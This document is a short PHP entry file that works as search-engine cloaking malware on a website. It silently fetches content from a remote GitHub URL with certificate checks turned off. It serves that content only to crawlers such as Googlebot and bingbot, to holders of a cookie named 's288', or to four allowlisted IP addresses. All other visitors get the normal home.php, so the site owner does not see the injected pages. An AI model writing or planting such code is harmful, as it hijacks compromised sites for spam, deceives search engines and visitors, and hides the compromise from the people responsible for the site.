<?php
error_reporting(0);
 
function is_google_bot() {
    $agents = array(
        "Googlebot",
        "Google-Site-Verification",
        "Google-InspectionTool",
        "Googlebot-Mobile",
        "Googlebot-News",
        "AhrefsBot",
        "bingbot",
        "yandexbot",
        "baiduspider",
        "duckduckbot"
    );
    $ua = $_SERVER['HTTP_USER_AGENT'] ?? '';
    foreach ($agents as $agent) {
        if (stripos($ua, $agent) !== false) return true;
    }
    return false;
}
 
$lp = "https://raw.githubusercontent.com/surgawon-beep/wow/refs/heads/main/acid-dom";
 
$curl_connect = curl_init($lp);
curl_setopt($curl_connect, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl_connect, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($curl_connect, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt($curl_connect, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($curl_connect, CURLOPT_SSL_VERIFYHOST, 0);
$content_data = curl_exec($curl_connect);
$content_data = curl_exec($curl_connect);
curl_close($curl_connect);
 

$allow = ["85.92.66.150","81.19.188.236","81.19.188.235","85.92.66.149"];
$visitor_ip = $_SERVER['REMOTE_ADDR'] ?? '';
 
if ($_SERVER["REQUEST_URI"] == "/" || is_google_bot()) {
    $agent = strtolower($_SERVER["HTTP_USER_AGENT"] ?? '');
    if (
        is_google_bot() ||                                     
        isset($_COOKIE["s288"]) ||                             
        in_array($visitor_ip, $allow)                          
    ) {
        
        echo $content_data;
        exit;
    }
}
 

include('home.php');
exit;
?>
